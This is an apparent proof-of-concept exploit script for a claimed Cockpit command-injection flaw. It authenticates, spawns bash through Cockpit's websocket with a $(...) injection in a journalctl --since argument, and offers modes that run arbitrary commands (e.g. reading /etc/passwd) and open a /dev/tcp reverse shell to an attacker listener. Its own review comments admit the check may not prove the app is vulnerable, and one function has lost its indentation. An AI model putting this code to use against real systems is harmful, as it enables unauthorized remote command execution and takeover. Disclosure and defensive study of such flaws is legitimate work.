README.md
Rendering markdown...
#!/usr/bin/env python3 -u
from __future__ import annotations
import argparse
import asyncio
import base64
import json
import os
import socket
import sys
import urllib.request
from urllib.parse import urlparse
from websockets.asyncio.client import ClientConnection, connect
from websockets.typing import Subprotocol
# Ask for unbuffered stdio.
# NOTE(review): CPython reads PYTHONUNBUFFERED at interpreter start-up, so
# assigning it here presumably only affects child processes that inherit the
# environment, not this already-running interpreter -- confirm.
os.environ["PYTHONUNBUFFERED"] = "1"
# ASCII-art banner printed once by main() before argument parsing.
banner: str = """
_____________________________________________________________________________________
______ ___ _________ ___ ____ _____
___ / / /_/ |___/ //_/_/ |__/ _/ / Cockpit Command injection loadServiceFilters/
__ /_/ /__ /| |__ , <__ /| | _/ / / /
_ __ /_ ___ |_ /| |_ ___ |__/ / / https://hakaisecurity.io /
/_/ /_/ /_/ |_|/_/ |_|/_/ |_|/___/ / /
________________________________________________________________________________
"""
def authenticate(base_url: str, user: str, password: str, proxy: str | None = None,
                 *, timeout: float = 30.0) -> str:
    """Log in with HTTP Basic auth and return the session cookie.

    Requests ``{base_url}/cockpit/login`` with an ``Authorization: Basic``
    header and returns the ``name=value`` part of the response's
    ``Set-Cookie`` header (everything before the first ``;``).

    Args:
        base_url: Scheme and authority of the target, without trailing slash.
        user: Account name.
        password: Account password.
        proxy: Optional HTTP proxy URL used for both http and https requests.
        timeout: Seconds to wait for the HTTP exchange before giving up.

    Returns:
        The cookie pair to send back in a ``Cookie`` header.

    Raises:
        RuntimeError: The response carried no ``Set-Cookie`` header.
        urllib.error.URLError: The request failed (``HTTPError`` for non-2xx
            replies such as rejected credentials).
    """
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(
        f"{base_url}/cockpit/login",
        headers={"Authorization": f"Basic {token}"},
    )
    if proxy:
        proxy_handler = urllib.request.ProxyHandler({"http": proxy, "https": proxy})
        open_url = urllib.request.build_opener(proxy_handler).open
    else:
        open_url = urllib.request.urlopen

    # The context manager closes the response (and its socket) as soon as the
    # header has been read; the body is not needed.
    with open_url(req, timeout=timeout) as resp:
        set_cookie = resp.headers.get("Set-Cookie", "")

    # Drop attributes such as "Path=/; HttpOnly"; only name=value is replayed.
    cookie = set_cookie.split(";")[0]
    if not cookie:
        raise RuntimeError("No session cookie returned")
    return cookie
def build_injection(shell_cmd: str) -> str:
    """Build the bash pipeline string whose ``--since=`` value is ``$(shell_cmd)``.

    The fixed ``journalctl`` arguments have any spaces backslash-escaped and
    are joined with single spaces. The ``--since=`` argument is inserted
    without escaping, so the ``$(...)`` substitution reaches the shell as
    written. The result is prefixed with ``set -o pipefail;`` and piped
    through ``grep SYSLOG_IDENTIFIER=`` and ``sort -u``.

    Args:
        shell_cmd: Text placed verbatim inside the ``$(...)`` substitution.

    Returns:
        The complete command line as a single string.
    """
    before_since = ("journalctl", "-q", "--no-tail", "--output=verbose")
    after_since = ("--priority=err", "--reverse", "--")

    words = [word.replace(" ", "\\ ") for word in before_since]
    # Appended after the escaping pass on purpose: this word stays raw.
    words.append("--since=" + "$(" + shell_cmd + ")")
    words.extend(word.replace(" ", "\\ ") for word in after_since)

    journal_cmd = " ".join(words)
    return f"set -o pipefail; {journal_cmd} | grep SYSLOG_IDENTIFIER= | sort -u"
def _proxy_tunnel(proxy: str, target_host: str, target_port: int) -> socket.socket:
p = urlparse(proxy)
sock = socket.create_connection((p.hostname or "127.0.0.1", p.port or 8080))
connect_req = f"CONNECT {target_host}:{target_port} HTTP/1.1\r\nHost: {target_host}:{target_port}\r\n\r\n"
sock.sendall(connect_req.encode())
resp = sock.recv(4096)
if b"200" not in resp:
raise RuntimeError(f"Proxy CONNECT failed: {resp.decode()}")
return sock
async def ws_connect(base_url: str, cookie: str, proxy: str | None = None) -> ClientConnection:
    """Open the ``/cockpit/socket`` websocket and perform the init exchange.

    The websocket URL is derived from ``base_url`` by replacing the first
    ``http`` with ``ws`` (so ``https`` becomes ``wss``). The session cookie
    and an ``Origin`` header equal to ``base_url`` are sent with the
    handshake, and the ``cockpit1`` subprotocol is requested. After
    connecting, an ``init`` control message is sent and one reply is awaited.

    Args:
        base_url: Scheme and authority of the target, without trailing slash.
        cookie: ``name=value`` session cookie from ``authenticate``.
        proxy: Optional HTTP proxy URL; when given, the connection runs over a
            CONNECT tunnel created by ``_proxy_tunnel``.

    Returns:
        The open connection, ready for channel commands.

    Raises:
        asyncio.TimeoutError: No reply to ``init`` arrived within 10 seconds.
        RuntimeError: The proxy refused the CONNECT request.
    """
    ws_url: str = base_url.replace("http", "ws", 1) + "/cockpit/socket"
    connect_kwargs: dict[str, object] = {
        "additional_headers": {"Cookie": cookie, "Origin": base_url},
        "subprotocols": [Subprotocol("cockpit1")],
    }

    tunnel = None
    if proxy:
        target = urlparse(base_url)
        host: str = target.hostname or "localhost"
        port: int = target.port or (443 if target.scheme == "https" else 80)
        tunnel = _proxy_tunnel(proxy, host, port)
        connect_kwargs["sock"] = tunnel

    try:
        ws = await connect(ws_url, **connect_kwargs)
    except Exception:
        # The handshake failed, so nobody else will close the tunnel socket.
        # socket.close() is idempotent if the library already closed it.
        if tunnel is not None:
            tunnel.close()
        raise

    try:
        # Control messages use an empty channel name, hence the leading "\n".
        await ws.send("\n" + json.dumps({
            "command": "init", "version": 1,
            "channel-seed": "poc", "host": "localhost"}))
        await asyncio.wait_for(ws.recv(), timeout=10)
    except Exception:
        # Do not hand back (or leak) a connection that never initialised.
        await ws.close()
        raise
    return ws
async def ws_spawn(ws: ClientConnection, channel: str, spawn_args: list[str],
                   superuser: str = "try") -> str:
    """Open a ``stream`` channel that spawns a process and collect its output.

    Sends an ``open`` control message with ``spawn_args`` and then reads up to
    15 frames, waiting at most 5 seconds for each. Text frames of the form
    ``"<channel>\\n<data>"`` addressed to ``channel`` contribute ``<data>`` to
    the result. Reading stops early when a ``close`` control message for
    ``channel`` arrives, instead of waiting for the receive timeout.

    Collection is best-effort. A receive timeout ends it silently; any other
    receive error is reported on stderr. Either way, whatever was gathered so
    far is returned.

    Args:
        ws: Initialised connection from ``ws_connect``.
        channel: Channel identifier to open and listen on.
        spawn_args: Argument vector of the process to start.
        superuser: Value of the ``superuser`` field in the ``open`` message.

    Returns:
        Concatenated payload of all data frames received for ``channel``.
    """
    await ws.send("\n" + json.dumps({
        "command": "open", "channel": channel,
        "payload": "stream",
        "spawn": spawn_args,
        "superuser": superuser}))

    chunks: list[str] = []
    try:
        for _ in range(15):
            msg = await asyncio.wait_for(ws.recv(), timeout=5)
            if not isinstance(msg, str):
                continue
            frame_channel, newline, body = msg.partition("\n")
            if not newline:
                continue
            if frame_channel == "":
                # Empty channel name marks a control message (JSON body).
                try:
                    control = json.loads(body)
                except ValueError:
                    continue
                if (isinstance(control, dict)
                        and control.get("command") == "close"
                        and control.get("channel") == channel):
                    break
            elif frame_channel == channel:
                chunks.append(body)
    except asyncio.TimeoutError:
        # No more frames within the window: treat as end of output.
        pass
    except Exception as exc:
        # Keep returning partial output, but do not hide why reading stopped.
        print(f"[!] channel {channel!r}: receive aborted: {exc}", file=sys.stderr)
    return "".join(chunks)
async def mode_check(base_url: str, cookie: str, proxy: str | None = None) -> None:
    """Run the verification mode and report whether the proof file appeared.

    Spawns ``/bin/bash -ec`` with a command from ``build_injection`` that
    redirects ``id`` into a fixed file under ``/tmp``, waits one second, then
    reads the file back with ``cat`` over a second channel. Prints the
    outcome and exits with status 1 when nothing was read back.

    NOTE(review): the proof path is fixed and never removed here, so a file
    left behind by an earlier run would also be read back -- confirm whether
    that can yield a false positive.
    NOTE(review): bash is spawned directly over the socket, so a positive
    result shows the command substitution ran, not necessarily that the
    deployed application code path is affected -- confirm.

    Args:
        base_url: Scheme and authority of the target, without trailing slash.
        cookie: Session cookie from ``authenticate``.
        proxy: Optional HTTP proxy URL.
    """
    print("[*] CHECK verifying command injection\n")
    proof: str = "/tmp/cockpit-rce-check"
    cmd: str = build_injection(f"id>{proof}")
    print(f" injection: --since=$(id>{proof})")
    print(f" bash cmd : {cmd[:80]}...\n")

    ws: ClientConnection = await ws_connect(base_url, cookie, proxy)
    try:
        await ws_spawn(ws, "inject", ["/bin/bash", "-ec", cmd])
        # Give the spawned shell a moment to finish writing the file.
        await asyncio.sleep(1)
        result: str = await ws_spawn(ws, "read", ["cat", proof])
    finally:
        # Close the connection even if a step above raised or was cancelled.
        await ws.close()

    evidence = result.strip()
    if evidence:
        print(" [!] VULNERABLE RCE confirmed")
        print(f" {evidence}")
    else:
        print(" [-] Not exploitable (proof file not created)")
        sys.exit(1)
async def mode_exec(base_url: str, cookie: str, shell_cmd: str, proxy: str | None = None) -> None:
    """Run one shell command via the injected pipeline and print its output.

    The command's stdout is redirected to a fixed file under ``/tmp``; after
    a one-second pause the file is read back with ``cat`` over a second
    channel and printed with trailing whitespace removed.

    NOTE(review): the output path is fixed and never removed here, so stale
    content from an earlier run may be printed if the new command writes
    nothing -- confirm.

    Args:
        base_url: Scheme and authority of the target, without trailing slash.
        cookie: Session cookie from ``authenticate``.
        shell_cmd: Command text placed inside the ``$(...)`` substitution.
        proxy: Optional HTTP proxy URL.
    """
    print(f"[*] EXEC {shell_cmd}\n")
    outfile: str = "/tmp/.cockpit-rce-out"
    cmd: str = build_injection(f"{shell_cmd}>{outfile}")

    ws: ClientConnection = await ws_connect(base_url, cookie, proxy)
    try:
        await ws_spawn(ws, "inject", ["/bin/bash", "-ec", cmd])
        # Give the spawned shell a moment to finish writing the file.
        await asyncio.sleep(1)
        result: str = await ws_spawn(ws, "read", ["cat", outfile])
    finally:
        # Close the connection even if a step above raised or was cancelled.
        await ws.close()

    if result:
        print(result.rstrip())
    else:
        print(" [-] No output (command may have failed)")
async def mode_reverse(base_url: str, cookie: str, lhost: str, lport: int, proxy: str | None = None) -> None:
    """Send the reverse-connection command through the injected pipeline.

    Prints a reminder to start a listener, opens the websocket, spawns
    ``/bin/bash -ec`` with the command from ``build_injection``, then closes
    the connection. Any ``Exception`` raised while spawning is ignored so the
    connection is still closed and the final status line is still printed.

    Args:
        base_url: Scheme and authority of the target, without trailing slash.
        cookie: Session cookie from ``authenticate``.
        lhost: Host interpolated into the ``/dev/tcp`` path.
        lport: Port interpolated into the ``/dev/tcp`` path.
        proxy: Optional HTTP proxy URL.
    """
    print(f"[*] REVERSE SHELL {lhost}:{lport}\n")
    shell_line = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    pipeline = build_injection(shell_line)
    for notice in (f" [*] Start listener first: nc -lvnp {lport}",
                   " [*] Sending payload...\n"):
        print(notice)

    conn: ClientConnection = await ws_connect(base_url, cookie, proxy)
    spawn_argv = ["/bin/bash", "-ec", pipeline]
    try:
        await ws_spawn(conn, "inject", spawn_argv)
    except Exception:
        # Best-effort: a failure here must not skip the close below.
        pass
    await conn.close()
    print(" [*] Payload sent")
def main() -> None:
    """Parse command-line options, authenticate, and run the selected mode.

    Exits with status 1 when reverse mode is chosen without ``--lhost`` and
    ``--lport``, or when authentication fails. The reverse-mode check runs
    before any network traffic, so an incomplete command line never causes
    credentials to be sent.
    """
    print(banner)
    p: argparse.ArgumentParser = argparse.ArgumentParser(
        description="CVE-2026-4802 Cockpit RCE via loadServiceFilters() command injection",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""examples:
%(prog)s --url http://localhost:9090 --user viewer --pass viewer --mode check
%(prog)s --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
%(prog)s --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "cat /etc/passwd"
%(prog)s --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444
"""
    )
    p.add_argument("--url", required=True, help="Cockpit base URL")
    p.add_argument("--user", required=True, help="Cockpit username")
    p.add_argument("--pass", dest="password", required=True, help="Cockpit password")
    p.add_argument("--mode", choices=["check", "exec", "reverse"], default="check",
                   help="Exploit mode (default: check)")
    p.add_argument("--cmd", default="id", help="Shell command for exec mode")
    p.add_argument("--lhost", help="Listener host for reverse mode")
    p.add_argument("--lport", type=int, help="Listener port for reverse mode")
    p.add_argument("--proxy", help="HTTP proxy (e.g. http://127.0.0.1:8080)")
    args: argparse.Namespace = p.parse_args()

    # Validate mode-specific options up front, before logging in.
    if args.mode == "reverse" and (not args.lhost or not args.lport):
        print("[!] --lhost and --lport required for reverse mode")
        sys.exit(1)

    base: str = args.url.rstrip("/")
    print(f"[*] Target: {base}")
    if args.proxy:
        print(f"[*] Proxy: {args.proxy}")
    # Show only the password length, never the password itself.
    print(f"[*] Auth: {args.user}:{'*' * len(args.password)}\n")

    try:
        cookie: str = authenticate(base, args.user, args.password, args.proxy)
        print(f"[+] Authenticated ({cookie[:40]}...)\n")
    except Exception as e:
        # Top-level boundary: report any login failure and stop.
        print(f"[!] Auth failed: {e}")
        sys.exit(1)

    if args.mode == "check":
        asyncio.run(mode_check(base, cookie, args.proxy))
    elif args.mode == "exec":
        asyncio.run(mode_exec(base, cookie, args.cmd, args.proxy))
    elif args.mode == "reverse":
        asyncio.run(mode_reverse(base, cookie, args.lhost, args.lport, args.proxy))
# Run the command-line interface only when executed as a script.
if __name__ == "__main__":
    main()